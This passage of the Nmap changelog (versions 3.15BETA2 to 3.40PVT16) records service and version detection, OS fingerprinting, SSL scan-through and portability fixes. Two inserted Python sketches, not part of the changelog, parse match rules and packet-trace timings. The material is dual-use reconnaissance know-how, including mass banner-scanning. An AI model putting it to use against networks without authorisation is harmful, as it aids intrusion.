o Updated the Nsock config.sub/config.guess to the same newer versions
that Nmap uses (for Mac OS X compilation).

Nmap 3.40PVT16

o Fixed a compilation problem on systems w/o OpenSSL that was
discovered by Solar Designer. I also fixed some compilation
problems on non-IPv6 systems. It now compiles and runs on my
Solaris and ancient OpenBSD systems.

o Integrated more services thanks to submissions from Niels Heinen
(zillion(a)safemode.org).

o Canonicalized the headers at the top of each Nmap/Nsock header source
file. This included clarifying our interpretation of derived works,
updating the copyright date to 2003, making the header a bit wider,
and a few other light changes. I've been putting this off for a
while, because it required editing about a hundred !#$# files!

Nmap 3.40PVT15

o Fixed a major bug in the Nsock time caching system. This could
cause service detection to inexplicably fail against certain ports in
the second or later machines scanned. Thanks to Solar Designer and HD
Moore for helping me track this down.

o Fixed some *BSD compilation bugs found by
Zillion (zillion(a)safemode.org).

o Integrated more services thanks to submissions from Fyodor Yarochkin
(fygrave(a)tigerteam.net), and Niels Heinen
(zillion(a)safemode.org), and some of my own exploring. There are
now 295 signatures.

o Fixed a compilation bug found by Solar Designer on machines that
don't have struct sockaddr_storage. Nsock now just uses "struct
sockaddr *" like connect() does.

o Fixed a bug found by Solar Designer which would cause the Nmap
portscan table to be truncated in -oN output files if the results are
very long.

o Changed a bunch of large stack arrays (e.g. int portlookup[65536])
into dynamically allocated heap pointers. The large stack variables
apparently caused problems on some architectures. This issue was
reported by osamah abuoun (osamah_abuoun(a)hotmail.com).

Nmap 3.40PVT14

o Added IPv6 support for service scan.

o Added an 'sslports' directive to nmap-service-probes. This tells
Nmap which service checks to try first for SSL-wrapped ports. The
syntax is the same as the normal 'ports' directive for non-ssl ports.
For example, the HTTP probe has an 'sslports 443' line and
SMTP-detecting probes have an 'sslports 465' line.

o Integrated more services thanks to submissions from MadHat
(madhat(a)unspecific.com), Solar Designer (solar(a)openwall.com), Dug
Song (dugsong(a)monkey.org), pope(a)undersec.com, and Brian Hatch
(bri(a)ifokr.org). There are now 288 signatures, matching these 65
service protocols:
chargen cvspserver daytime domain echo exec finger font-service
ftp ftp-proxy http http-proxy hylafax ident ident imap imaps ipp
ircbot ircd irc-proxy issrealsecure landesk-rc ldap meetingmaker
microsoft-ds msrpc mud mysql ncacn_http ncp netbios-ns netbios-ssn
netsaint netwareip nntp nsclient oracle-tns pcanywheredata pop3
pop3s postgres printer qotd redcarpet rlogind rpc rsync rtsp shell
smtp snpp spamd ssc-agent ssh ssl telnet time upnp uucp vnc
vnc-http webster whois winshell X11

o Added a Lotus Notes probe from Fyodor Yarochkin
(fygrave(a)tigerteam.net).

o Dug Song wins the "award" for most obscure service fingerprint
submission. Nmap now detects Dave Curry's Webster dictionary server
from 1986 :).

o Service fingerprints now include a 'T=SSL' attribute when SSL
tunneling was used.

o More portability enhancements thanks to Solar Designer and his Linux
2.0 libc5 boxes.

o Applied a patch from Gisle Vanem (giva(a)bgnett.no) which improves
Windows emulation of the UNIX mmap() and munmap() memory mapping calls.

Nmap 3.40PVT13

o Added SSL-scan-through support. If service detection finds a port to be
SSL, it will transparently connect to the port using OpenSSL and use
version detection to determine what service lies beneath. This
feature is only enabled if OpenSSL is available at build time. A
new --with-openssl=DIR configure option is available if OpenSSL is
not in your default compiler paths. You can use --without-openssl
to disable this functionality. Thanks to Brian Hatch
(bri(a)ifokr.org) for sample code and other assistance. Make sure
you use a version without known exploitable overflows. In
particular, versions up to and including OpenSSL 0.9.6d and
0.9.7-beta2 contained serious vulnerabilities described at
http://www.openssl.org/news/secadv_20020730.txt . Note that these
vulnerabilities are well over a year old at the time of this
writing.

o Integrated many more services thanks to submissions from Brian
Hatch, HellNBack ( hellnbak(a)nmrc.org ), MadHat, Solar Designer,
Simple Nomad, and Shawn Wallis (swallis(a)ku.edu). The number of
signatures has grown from 242 to 271. Thanks!

o Integrated Novell Netware NCP and MS Terminal Server probes from
Simple Nomad (thegnome(a)nmrc.org).

o Fixed a segfault found by Solar Designer that could occur when
scanning certain "evil" services.

o Fixed a problem reported by Solar Designer and MadHat (
madhat(a)unspecific.com ) where Nmap would bail when certain Apache
version/info responses were particularly long. It could happen in
other cases as well. Now Nmap just prints a warning.

o Fixed some portability issues reported by Solar Designer
( solar(a)openwall.com )

Nmap 3.40PVT12

o I added probes for SSL (session startup request) and microsoft-ds
(SMB Negotiate Protocol request).

o I changed the default read timeout for a service probe from 7.5s to 5s.

o Fixed a one-character bug that broke many scans when -sV was NOT
given. Thanks to Blue Boar (BlueBoar(a)thievco.com) for the report.

Nmap 3.40PVT11

o Integrated many more services thanks to submissions from Simple
Nomad, Solar Designer, jerickson(a)inphonic.com, Curt Wilson, and
Marco Ivaldi. Thanks! The match line count has risen from 201 to 242.

o Implemented a service classification scheme to separate the
vendor/product name from the version number and any extra info that
is provided. Instead of v/[big version string]/, the new match
lines include v/[vendor/productname]/[version]/[extrainfo]/ . See
the docs at the top of nmap-service-probes for more info. This
doesn't change the normal output (which lumps them together anyway),
but they are separate in the XML so that higher-level programs can
easily match against just a product name. Here are a few examples
of the improved service element:
extrainfo="protocol 1.99" method="probed" conf="10" />
method="probed" conf="10" />
extrainfo="rpc #100000" method="probed" conf="10" />


o I went through nmap-service-probes and added the vendor name to more
entries. I also added the service name where the product name
itself didn't make that completely obvious.

o SCO Corporation of Lindon, Utah (formerly Caldera) has lately taken
to an extortion campaign of demanding license fees from Linux users
for code that they themselves knowingly distributed under the terms
of the GNU GPL. They have also refused to accept the GPL, claiming
that some preposterous theory of theirs makes it invalid. Meanwhile
they have distributed GPL-licensed Nmap in (at least) their
"Supplemental Open Source CD". In response to these blatant
violations, and in accordance with section 4 of the GPL, we hereby
terminate SCO's rights to redistribute any versions of Nmap in any
of their products, including (without limitation) OpenLinux,
Skunkware, OpenServer, and UNIXWare.

Nmap 3.40PVT10

o Added "soft matches". These are similar to normal match lines in
that they provide a regex for recognizing a service (but no version).
But instead of stopping at softmatch service recognition, the scan
continues looking for more info. It only launches probes that are
known-capable of matching the softmatched service. If no version
number is found, at least the determined service is printed. A
service print for submission is also provided in that case. So this
provides more informative results and improves efficiency.

o Cleaned up the Windows support a bit and did more testing and
fixing. Windows service detection seems to be working fine for me
now, although my testing is still pretty limited. This release
includes a Windows binary distribution and the README-WIN32 has been
updated to reflect new compilation instructions.

o More service fingerprints! Thanks to Solar Designer, Max Vision,
Frank Denis (Jedi/Sector One) for the submissions. I also added a
bunch from my own testing. The number of match lines went from 179
to 201.

o Updated XML output to handle new version and service detection
information. Here are a few examples of the new output:
name="ssh" version="OpenSSH 3.1p1 (protocol 1.99)" method="probed"
conf="10" />

name="rpcbind" version="2 (rpc #100000)" method="probed" conf="10" />
name="rndc" method="table" conf="3" />

o Fixed issue where Nmap would quit when ECONNREFUSED was returned
when we try to read from an already-connected TCP socket. FreeBSD
does this for some reason instead of giving ECONNRESET. Thanks to
Will Saxon (WillS(a)housing.ufl.edu) for the report.

o Removed the SERVICEMATCH_STATIC match type from
nmap-service-probes. There wasn't much benefit of this over regular
expressions, so it isn't worth maintaining the extra code.

Nmap 3.40PVT9

o Added/fixed numerous service fingerprints thanks to submissions from
Max Vision, MadHat, Seth Master. Match lines went
from 164 to 179.

o The Winpcap libraries used in the Windows build process have been
upgraded to version 3.0.

o Most of the Windows port is complete. It compiles and service scan
works (I didn't test very deeply) on my WinXP box with VS.Net 2003.
I'll try to work out remaining kinks and do some cleanup for the next
version. The Windows code was restructured and improved quite a bit,
but much more work remains to be done in that area. I'll probably
do a Windows binary .zip release of the next version.

o Various minor fixes

Nmap 3.40PVT8

o Service scan is now OFF by default. You can activate it with -sV.
Or use the snazzy new -A (for "All recommended features" or
"Aggressive") option which turns on both OS detection and service
detection.

o Fixed compilation on my ancient OpenBSD 2.3 machine (a Pentium 60 :)

o Added/fixed numerous service fingerprints thanks to submissions from
Brian Hatch, HD Moore, Anand R., and some of my own testing. The
number of match lines in this version grows from 137 to 164! Please
keep 'em coming!

o Various important and not-so-important fixes for bugs I encountered
while test scanning.

o The RPC grinder no longer prints a startup message if it has no
RPC-detected ports to scan.

o Some of the service fingerprint length limitations are relaxed a bit
if you enable debugging (-d).

Nmap 3.40PVT7

o Added a whole bunch of services submitted by Brian Hatch
(bri(a)ifokr.org). I also added a few Windows-related probes.
Nmap-service-probes has gone from 101 match strings to 137. Please
keep the submissions coming.

o The question mark now only appears for ports in the OPEN state and
when service detection was requested.

o I now print a separator bar between service fingerprints when Nmap
prints more than one for a given host so that users understand to
submit them individually (suggested by Brian Hatch (bri(a)ifokr.org))

o Fixed a bug that would cause Nmap to print "empty" service
fingerprints consisting of just a semi-colon. Thanks to Brian Hatch
(bri(a)ifokr.org) for reporting this.

Nmap 3.40PVT6

o Banner-scanned hundreds of thousands of machines for ports
21,23,25,110,3306 to collect default banners. Where the banner made
the service name/version obvious, I integrated them into
nmap-service-probes. This increased the number of 'match' lines from
27 to more than 100.

o Created the service fingerprint submission page at
http://www.insecure.org/cgi-bin/servicefp-submit.cgi

o Changed the service fingerprint format slightly for easier
processing by scripts.

o Applied a large portability patch from Albert Chin-A-Young
(china(a)thewrittenword.com). This cleans up a number of things,
particularly for IRIX, Tru64, and Solaris.

o Applied NmapFE patch from Peter Marschall (peter(a)adpm.de) which
"makes sure changes in the relay host and scanned port entry fields
are displayed immediately, and also keeps the fields editable after
de- and reactivating them."

Nmap 3.40PVT4

o Limited the size of service fingerprints to roughly 1024 bytes.
This was suggested by Niels Heinen (niels(a)heinen.ws), because the previous
limit was excessive. The number of fingerprints printed is also now
limited to 10.

o Fixed a segmentation fault that could occur when ping-scanning large
networks.

o Fixed service scan to gracefully handle host_timeout occurrences when
they happen during a service scan.

o Fixed a service_scan bug that would cause an error when hosts send
data and then close() during the NULL probe (when we haven't sent
anything).

o Applied a patch from Solar Designer (solar(a)openwall.com) which
corrects some errors in the Russian man page translation and also a
couple typos in the regular man page. Then I spell-checked the man
page to reduce future instances of foreigners sending in diffs to
correct my English :).

Nmap 3.40PVT3

o Nmap now prints a "service fingerprint" for services that it is
unable to match despite returning data. The web submission page it
references is not yet available.

o Service detection now does RPC grinding on ports it detects to be
running RPC.

o Fixed a bug that would cause Nmap to quit with an Nsock error when
--host_timeout was used (or when -T5 was used, which sets it
implicitly).

o Fixed a bug that would cause Nmap to fail to print the OS
fingerprint in certain cases. Thanks to Ste Jones
(root(a)networkpenetration.com) for the problem report.

Nmap 3.40PVT2

o Nmap now has a simple VERSION detection scheme. The 'match' lines in
nmap-service-probes can specify a template version string
(referencing subexpression matches from the regex in a Perl-like
manner) so that the version is determined at the same time as the
service. This handles many common services in a highly efficient
manner. A more complex form of version detection (that initiates
further communication w/the target service) may be necessary
eventually to handle services that aren't as forthcoming with
version details.

o The Nmap port state table now wastes less whitespace due to using a new
and stingy NmapOutputTable class. This makes it easier to read, and
also leaves more room for version info and possibly other enhancements.

o Added 's' option to match lines in nmap-service-probes. Just as
with the Perl 's' option, this one causes '.' in the regular
expression to match any character INCLUDING newline.

o The WinPcap header timestamp is no longer used on Windows as it
sometimes can be a couple seconds different than gettimeofday() (which
is really _ftime() on Windows) for some reason. Thanks to Scott
Egbert (scott.egbert(a)citigroup.com) for the report.

o Applied a patch by Matt Selsky (selsky(a)columbia.edu) which fixes
configure.in in such a way that the annoying header file "present but
cannot be compiled" warning no longer appears on Solaris.

o Applied another patch from Matt that (we hope) fixes the "present
but cannot be compiled" warning -- this time for Mac OS X.

o Port table header names are now capitalized ("SERVICE", "PORT", etc)
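
The 3.40PVT2 entries above describe 'match' lines whose version template refers back to regex subexpressions, plus an 's' option that lets '.' cross newlines. The sketch below is an added example, not code from Nmap or from this page: the line layout, the sample rules and all function names are assumptions made for illustration. Captured text comes from the remote host, so it is stripped of non-printable characters before it reaches a report.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Assumed, simplified line layout for this example (not the real file grammar):
#   match <service> m<D><regex><D>[s] v<D><template><D>
# <D> is any delimiter character; a trailing 's' makes '.' match newlines too.
MATCH_LINE = re.compile(r"^match\s+(\S+)\s+m(.)(.*?)\2(s?)\s+v(.)(.*?)\5\s*$")

# Constructed sample rules, written for this example.
SAMPLE_RULES = r"""
# service, pattern, version template
match ssh m/^SSH-([\d.]+)-OpenSSH[_-](\S+)/ v/OpenSSH $2 (protocol $1)/
match http m|^HTTP/1\.[01] \d{3}.*\r\nServer: Apache/([\d.]+)|s v|Apache httpd $1|
"""


class MatchRule(NamedTuple):
    service: str
    regex: re.Pattern
    template: str


def parse_match_line(line: str) -> MatchRule:
    """Turn one match line into a compiled rule."""
    parsed = MATCH_LINE.match(line.strip())
    if parsed is None:
        raise ValueError(f"not a match line: {line!r}")
    service, _, regex_src, flag, _, template = parsed.groups()
    # Banners are raw bytes off the wire, so compile a bytes pattern.
    flags = re.DOTALL if flag == "s" else 0
    return MatchRule(service, re.compile(regex_src.encode("ascii"), flags), template)


def load_rules(text: str) -> List[MatchRule]:
    """Parse every non-blank, non-comment line of a rules file."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            rules.append(parse_match_line(line))
    return rules


def render_version(template: str, hit: "re.Match") -> str:
    """Expand $1..$9 in the template with the captured subexpressions."""
    def expand(ref):
        index = int(ref.group(1))
        if index > hit.re.groups:
            return ""
        text = (hit.group(index) or b"").decode("latin-1")
        # The capture is remote-controlled data: neutralise control bytes.
        return "".join(ch if ch.isprintable() else "?" for ch in text)
    return re.sub(r"\$(\d)", expand, template)


def identify(banner: bytes, rules: List[MatchRule]) -> Optional[Tuple[str, str]]:
    """Return (service, version) from the first rule that matches, else None."""
    for rule in rules:
        hit = rule.regex.search(banner)
        if hit:
            return rule.service, render_version(rule.template, hit)
    return None


if __name__ == "__main__":
    rules = load_rules(SAMPLE_RULES)
    # Constructed banners.
    print(identify(b"SSH-1.99-OpenSSH_3.5p1\r\n", rules))
    print(identify(b"HTTP/1.1 200 OK\r\nDate: Mon, 01 Jan 2001 00:00:00 GMT\r\n"
                   b"Server: Apache/1.3.27 (Unix)\r\n\r\n", rules))
```

Service and version come out of a single regex pass over data the service already sent, which is why the entry calls the scheme efficient.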

Nmap 3.40PVT1

o Initial implementation of service detection. Nmap will now probe
ports to determine what is listening, rather than guessing based on
the nmap-services table lookup. This can be very useful for
services on unidentified ports and for UDP services where it is not
always clear (without these probes) whether the port is really open
or just firewalled. It is also handy for when services are run on
the well-known-port of another protocol -- this is happening more
and more as users try to circumvent increasingly strict firewall
policies.

o Nmap now uses the excellent libpcre (Perl Compatible Regular
Expressions) library from http://www.pcre.org/ . Many systems
already have this, otherwise Nmap will use the copy it now includes.
If your libpcre is hidden away in some nonstandard place, give
./configure the new --with-libpcre=DIR directive.

o Nmap now uses the C++ Standard Template Library (STL). This makes
programming easier, but if it causes major portability or bloat
problems, I'll reluctantly remove it.

o Applied a patch from Javier Kohen (jkohen(a)coresecurity.com) which
normalizes the names of many Microsoft entries in the
nmap-os-fingerprints file.

o Applied a patch by Florin Andrei (florin(a)sgi.com) to the Nmap RPM
spec file. This uses the 'Epoch' flag to prevent the Redhat Network
tool from marking my RPMs as "obsolete" and "upgrading" to earlier
Redhat-built versions. A compilation flag problem is also fixed.

Nmap 3.30

o Implemented the largest-ever OS fingerprint update! Roughly 300
fingerprints were added/modified. These massive changes span the
gamut from AIX 5.1 to the ZyXEL Prestige broadband router line.
Notable updates include OpenBSD 3.3, FreeBSD 5.1, Mac OS X 10.2.6,
Windows 2003 server, and more WAPs and broadband routers than you
can shake a stick at. Someone even submitted a fingerprint for
Debian Linux running on the Microsoft Xbox. You have to love that
irony :). Thanks to everyone who submitted fingerprints using the
URL Nmap gives you when it gets a clean reading but is stumped. The
fingerprint DB now contains almost 1000 fingerprints.

o Went through every one of the fingerprints to normalize the
descriptions a bit. I also looked up what all of the devices are
(thanks E*Bay and Google!). Results like "Nexland ISB Pro800 Turbo"
and "Siemens 300E Release 6.5" are much more useful when you add the
words "cable modem" and "business phone system"

o Added a new classification system to nmap-os-fingerprints. In
addition to the standard text description, each entry is now
classified by vendor name (e.g. Sun), underlying OS (e.g. Solaris),
OS generation (e.g. 7), and device type ("general purpose", router,
switch, game console, etc). This can be useful if you want to (say)
locate and eliminate the SCO systems on a network, or find the
wireless access points (WAPs) by scanning from the wired side.

o Classification system described above is now used to print out a
"device type" line and OS categories for matches. The free-form
English details are still printed as well. Nmap can sometimes
provide classifications even where it used to provide nothing
because of "too many matches". These have been added to XML output
as well. They are not printed for the "grepable output", as I
consider that format deprecated.

o Nmap will now sometimes guess in the "no exact matches" case, even
if you don't use the secret --osscan_guess or -fuzzy options.

o Applied another huge NmapFE patch from Peter Marschall
(peter(a)adpm.de). This revamps the interface to use a tabbed
format that allows for many more Nmap options to be used. It also
cleans up some crufty parts of the code. Let me and Peter know what
you think (and if you encounter any problems).

o Windows and Amiga ports now use packet receive times from libpcap.
Let me know if you get any "time computation problem" errors.

o Updated version of the Russian man page translation from Alex Volkov
(alex(a)cherepovets-city.ru).

Nmap 3.28

o Fixed (I hope) an issue that would cause Nmap to print "Serious time
computation problem in adjust_timeout ..." and quit. The ultimate
cause was demonstrated by this --packet_trace snippet that Russel
Miller (rmiller(a)duskglow.com) sent me:
SENT (0.0500s) ICMP 0.0.0.0 > 127.0.0.1 Echo request (type=8/code=0) ...
RCVD (0.0450s) ICMP 127.0.0.1 > 127.0.0.1 Echo reply (type=0/code=0) ...
As you can see, the ping reply appears to come BEFORE the request
was sent(!). This sort of thing happens on at least Linux and
Windows. The send time is obtained from gettimeofday(timeval, NULL),
while the receive time comes from the libpcap packet header. If anyone knows why this
occurs, or (even better) knows a good way to fix it, let me know.
For now, I am allowing the response to come up to .05s "before" the
request. That is gross.

o For years, Nmap has added -I/usr/local/include and -L/usr/local/lib
to the compiler line to grab local libraries. I have removed this
behavior by default, and added a '--with-localdirs' configure option
that adds it back. If Nmap fails to compile now without the above
option, please let me know. I can change the default back if this
change causes more problems than it solves. People (such as certain
ports tree packagers) who know they don't want /usr/local should
specify --without-localdirs rather than relying on that always being
the default.

o Fixed (I hope) a problem that led to the error message "Assertion
`tqi->sockets[probe_port_num][seq] == -1' failed".

o Fixed a problem that would cause Nmap on Windows to send ICMP ping
packets from 0.0.0.0 instead of the appropriate source IP. Thanks
to Yeti (boxed(a)blueyonder.co.uk) for the report.

o Applied some changes from Solar Designer (solar(a)openwall.com)
which fix some typos and also suggest safer /tmp/ behavior in the
HACKING file and Lithuanian man page. These changes are for the
Nmap package of his Openwall GNU/*/Linux (Owl) distribution.
[ http://www.openwall.com/Owl/ ]

o For Solaris, I now define NET_SIZE_T to size_t rather than socklen_t
in nmap.h. Isn't that exciting?!!! Hopefully this will help
compilation on Solaris 2.6 (and perhaps earlier). If any Solaris
users notice new compilation problems, please let me know. Thanks to
Al Smith (Al.Smith(a)aeschi.ch.eu.org) for reporting the issue.

o Removed an errant getopt() prototype in nbase/getopt.h which should
hopefully improve compilation on certain Solaris boxes and BSD
variants.

o SCO operating systems are no longer supported due to their recent
(and absurd) attacks against Linux and IBM. Bug reports relating to
UnixWare will be ignored, or possibly even laughed at derisively.
Note that I have no reason to believe anyone has ever used Nmap on
SCO systems. UnixWare and OpenServer suck.

o Fixed a problem with small --max_parallelism values when non-root ping
scanning that would cause Nmap to say "sendconnecttcpquery: Could
not scavenge a free socket!" and quit. Problem was reported by
Justin A (justin(a)bouncybouncy.net) as Debian Bug #195463.

o Applied (with a few modifications) a large NmapFE patch from Peter
Marschall (peter(a)adpm.de). This patch adds a bunch more scan/ping
options and cleans up some redundant NmapFE code.

o Included new Russian man page translation by Alex Volkov
(alex(a)cherepovets-city.ru)

o Changed many single-quotes (') into double quotes (") in the man
page due to a disagreement over whether to represent them as (') or
(\') in nroff.

o Included --packet_trace support for Explicit Congestion Notification
(RFC 2481/3168) flags thanks to a patch sent in by Maik Pfeil
(root(a)bundesspionageministerium.de)

o Included --packet_trace support for a few (unusual) ICMP types in
case Nmap receives them. The patch was also sent by Maik Pfeil.

o Fixed a problem with redirecting XML/Grep/Machine output to stdout
on Windows (e.g. -oX - ). Problem was reported by Wei Jiang
(Wei.Jiang(a)bindview.com)

o Made "-g -Wall" compiler flags dependent on availability of gcc/g++
since some other compilers do not support them.

o I spam-protected the email addresses in this file. I fervently hope
that within 5 years we will be able to defeat this scourge through
technology and laws, so that we may again list our email addresses
openly without fear of abuse by criminal spammers. Oh, and it would
be a shame if the spiders went through this whole page and only
found uce@ftc.gov, rhundt@fcc.gov, jquello@fcc.gov, sness@fcc.gov,
president@whitehouse.gov, haesslich@loyalty.org, and rchong@fcc.gov.
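
The first 3.28 entry above describes replies that appear to arrive before their probes because send and receive times come from different clocks, with a .05s allowance as the workaround. The sketch below is an added example, not Nmap's code: it parses trace lines in the layout quoted in that entry, pairs each reply with its probe, and applies the allowance. Clamping a tolerated negative value to zero, the status names and every line after the first two sample lines are assumptions of this example.

```python
import re
from decimal import Decimal
from typing import Dict, List, NamedTuple, Optional

TOLERANCE_US = 50_000  # the ".05s" allowance described in the changelog entry

# Layout taken from the two trace lines quoted in the entry:
#   SENT|RCVD (<seconds>s) <proto> <src> > <dst> <detail>
TRACE_LINE = re.compile(r"^(SENT|RCVD) \((\d+\.\d+)s\) (\S+) (\S+) > (\S+) (.*)$")

# First two lines are the ones quoted on the page; the rest are constructed.
SAMPLE_TRACE = """\
SENT (0.0500s) ICMP 0.0.0.0 > 127.0.0.1 Echo request (type=8/code=0) ...
RCVD (0.0450s) ICMP 127.0.0.1 > 127.0.0.1 Echo reply (type=0/code=0) ...
SENT (1.0000s) ICMP 192.0.2.1 > 192.0.2.10 Echo request (type=8/code=0)
RCVD (1.0123s) ICMP 192.0.2.10 > 192.0.2.1 Echo reply (type=0/code=0)
SENT (2.5000s) ICMP 192.0.2.1 > 192.0.2.20 Echo request (type=8/code=0)
RCVD (2.3000s) ICMP 192.0.2.20 > 192.0.2.1 Echo reply (type=0/code=0)
"""


class TraceEvent(NamedTuple):
    direction: str
    time_us: int
    proto: str
    src: str
    dst: str
    detail: str


class RttSample(NamedTuple):
    target: str
    raw_us: int             # receive time minus send time, may be negative
    rtt_us: Optional[int]   # value safe to feed into timeout estimation
    status: str             # "ok", "skew-tolerated" or "rejected"


def parse_trace_line(line: str) -> Optional[TraceEvent]:
    """Parse one trace line; return None for anything in another layout."""
    m = TRACE_LINE.match(line.strip())
    if m is None:
        return None
    # Decimal avoids float rounding when converting to whole microseconds.
    time_us = int(Decimal(m.group(2)) * 1_000_000)
    return TraceEvent(m.group(1), time_us, m.group(3), m.group(4), m.group(5), m.group(6))


def measure_rtts(trace_text: str) -> List[RttSample]:
    """Pair each RCVD with the latest SENT to that host and classify the RTT."""
    pending: Dict[str, TraceEvent] = {}
    samples: List[RttSample] = []
    for line in trace_text.splitlines():
        event = parse_trace_line(line)
        if event is None:
            continue
        if event.direction == "SENT":
            pending[event.dst] = event
            continue
        probe = pending.pop(event.src, None)
        if probe is None:
            continue  # unsolicited packet, nothing to time it against
        raw = event.time_us - probe.time_us
        if raw >= 0:
            samples.append(RttSample(event.src, raw, raw, "ok"))
        elif raw >= -TOLERANCE_US:
            # Clock-source disagreement inside the allowance: treat as 0.
            samples.append(RttSample(event.src, raw, 0, "skew-tolerated"))
        else:
            # Too far "before" the probe to blame on skew; keep it out of
            # the timing statistics instead of aborting.
            samples.append(RttSample(event.src, raw, None, "rejected"))
    return samples


if __name__ == "__main__":
    for sample in measure_rtts(SAMPLE_TRACE):
        print(sample)
```

The same comparison applies whenever timestamps from two sources are correlated, for example capture timestamps against application logs.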

Nmap 3.27

o Nmap now compiles under Amiga thanks to patches sent by Diego
Casorran (dcr8520(a)amiga.org).

o Fixed a backwards WIN32 ifdef that broke UDP and small-fragment
scans for some operating systems other than Linux and Windows.
Thanks to Guido van Rooij (guido(a)gvr.org) for reporting the problem
and sending a patch.

o Applied patch from Marius Strobl (marius(a)alchemy.franken.de) which improves
the definition of NET_SIZE_T on FreeBSD so that it compiles on
64-bit platforms.

Nmap 3.26

o Fixed Mac OS X Compilation (at least on most of the machines
tested). You will probably need to type
"./configure CPP=/usr/bin/cpp" instead of simply "./configure". If
you still have trouble, drop me an email. Thanks to everyone who
provided or offered shell accounts!

o Fixed a segmentation fault several people reported that was
introduced in 3.25. This problem manifests itself intermittently
in many normal situations involving large-network scanning. So all
3.25 users are urged to upgrade. Pre-3.25 users should upgrade too,
since 3.25 included so many improvements :).

Nmap 3.25

o I added UDP-based "ping" scanning. The -PU option can take an
optional portlist like the TCP "ping" options (-PS, -PA), but it sends
a UDP packet to the targets and expects hosts that are up to reply
with a port unreachable (or possibly a UDP response if the port is
open). This one is likely to work best against closed ports, since
many open ports don't respond to empty requests.

o Fixed (I hope) problem where Nmap would abort, complaining that
"Assertion `pt->down_this_block > 0' failed". Thanks to
ray(a)24hoursecurity.org and mugz(a)x-mafia.com for reporting and
helping me debug this problem.

o Fixed a GCC dependency reported by Ayamura Kikuchi
(ayamura(a)keio.net)

o Fixed an "assertion failure" which would cause Nmap to exit when you
specify a --max_rtt_timeout below 3000. Thanks to Tammy Rathbun
(rathbun2(a)llnl.gov) and Jan Roger Wilkens (jrw(a)proseq.net) for
reporting this.

o Packet receive times are now obtained from libpcap rather than
simply using the time the packets are passed to Nmap. This should
improve performance slightly. I was not able to get this to work
properly on Windows (either pcap or raw) -- join the nmap-dev list
if you have ideas.

o Fixed bug that caused Nmap to ignore certain RST responses when you
do both -PS and -PA.

o Modified ping scan to work better when many instances of Nmap are
executed concurrently.

o I'm now linking directly to the gzip compressed version of Nmap on
the homepage as well as the .bz2.

o Fixed a portability problem that caused BSD Make to bail out.

o Fixed a divide by zero error caused when non-root users (on UNIX)
explicitly request ICMP pings (which require root privileges). Now it
prints a warning and uses the normal non-root TCP connect() ping.
Jaroslav Sladek (jup(a)matfyz.cz) found the bug and provided the patch.

o Made Nmap more tolerant of corrupt nmap-services and nmap-protocols
files thanks to report & patch sent by Phix (phix(a)hush.com)

o Added some more port numbers sent in by Seth Master
(smaster(a)stanford.edu). He has been a frequent nmap-services
contributor in the last couple months.

o Added --packet_trace support to Windows

o Removed superfluous "addport" line in the XML output (patch from Max
Schubert (nmap(a)webwizarddesign.com)).

o Merged wintcpip.cc into tcpip.cc to avoid the headache of
maintaining many nearly-identical functions.

o Fixed an assertion failure crash related to combining port 0 scans
and OS scan. Thanks to A.Jones(a)mvv.de for reporting this.

o Fixed some compilation problems on systems without IPv6 support --
patch sent by Jochen Erwied (Jochen.Erwied(a)mbs-software.info)

o Applied patch from Jochen Erwied (Jochen.Erwied(a)mbs-software.info)
which fixes the format strings used for printing certain timestamps.

o Upgraded to autoconf 2.57, including the latest config.guess/config.sub

o Renamed configure.ac files to configure.in as recommended by the
latest autoconf documentation.

o Changed the wording of NmapFE Gnome entries to better-comply with
Gnome's Human Interface Guidelines (HIG). Suggested by Axel Krauth
(krauth(a)fmi.uni-passau.de)

Nmap 3.20

o The random IP input option (-iR) now takes an argument specifying
how many IPs you want to scan (e.g. -iR 1000). Specify 0 for the old
never-ending scan behavior.

o Fixed a tricky memory leak discovered by Mugz (mugz(a)x-mafia.com).

o Fixed output truncation problem noted by Lionel CONS (lionel.cons(a)cern.ch)

o Fixed a bug that would cause certain incoming ICMP error messages to
be improperly ignored.

Nmap 3.15BETA3

o Made numerous improvements to the timing behavior of "-T Aggressive"
(same as -T4) scans. It is now recommended for regular use by
impatient people with a fast connection. "-T Insane" mode has also
been updated, but we only recommend that for, well, insane people.

o Made substantial changes to the SYN/connect()/Window scanning
algorithms for improved speeds, especially against heavily filtered
hosts. If you notice any timing problems (misidentified ports,
etc.), please send me the details (including full Nmap output and a
description of what is wrong). Reports of any timing problems with
-T4 would be helpful as well.

o Changed Nmap such that ALL syn scan packets are sent from the port
you specify with -g. Retransmissions used to utilize successively
higher ports. This change has a downside in that some operating
systems (such as Linux) often won't reply to the retransmissions
because they reuse the same connection specifier quad
(srcip:srcport:dstip:dstport). Overall I think this is a win.

o Added timestamps to "Starting nmap" line and each host port scan in
verbose (-v) mode. These are in ISO 8601 standard format because
unlike President Bush, we actually care about International
consensus :).

o Nmap now comes by default in .tar.bz2 format, which compresses about
20% further. You can still find .tgz in the dist directory at
http://download.insecure.org/nmap/dist/?M=D .

o Various other minor bug fixes, new services, fingerprints, etc.

Nmap 3.15BETA2

o I added support for a brand new "port" that many of you may have
never scanned before! UDP & TCP "port 0" (and IP protocol 0) are now
permitted if you specify 0 explicitly. An argument like "-p -40"
would still scan ports 1-40. Unlike ports, protocol 0 IS now scanned
by default. This now works for ping probes too (e.g., -PS, -PA).

o Applied patch by Martin Kluge (martin(a)elxsi.info) which adds --ttl
option, which sets the outgoing IPv4 TTL field in packets sent via
all raw scan types (including ping scans and OS detection). The
patch "should work" on Windows, but hasn't been tested. A TTL of 0
is supported, and even tends to work on a LAN:
14:17:19.474293 192.168.0.42.60214 > 192.168.0.40.135: S 326:326(0) [ttl 0]
14:17:19.474456 192.168.0.40.135 > 192.168.0.42.60214: S 280:280(0) ack 326 (ttl 128)

o Applied patch by Gabriel L. Somlo ( somlo(a)acns.colostate.edu ) which
extends the multi-ping-port functionality to nonroot and IPv6
connect() users.

o I added a new --datadir command line option which allows you to
specify the highest priority directory for Nmap data files
nmap-services, nmap-os-fingerprints, and nmap-rpc. Any files which
aren't in the given dir, will be searched for in the $NMAPDIR
environmental variable, ~/nmap/, a compiled in data directory
(e.g. /usr/share/nmap), and finally the current directory.

o Fixed Windows (VC++ 6) compilation, thanks to patches from Kevin
Davis (computerguy(a)cfl.rr.com) and Andy Lutomirski
(luto(a)stanford.edu)

o Included new Latvian man page translation by
"miscelerious options" (misc(a)inbox.lv)

o Fixed Solaris compilation when Sun make is used rather than GNU
make. Thanks to Tom Duffy (tduffy(a)sun.com) for assistance.

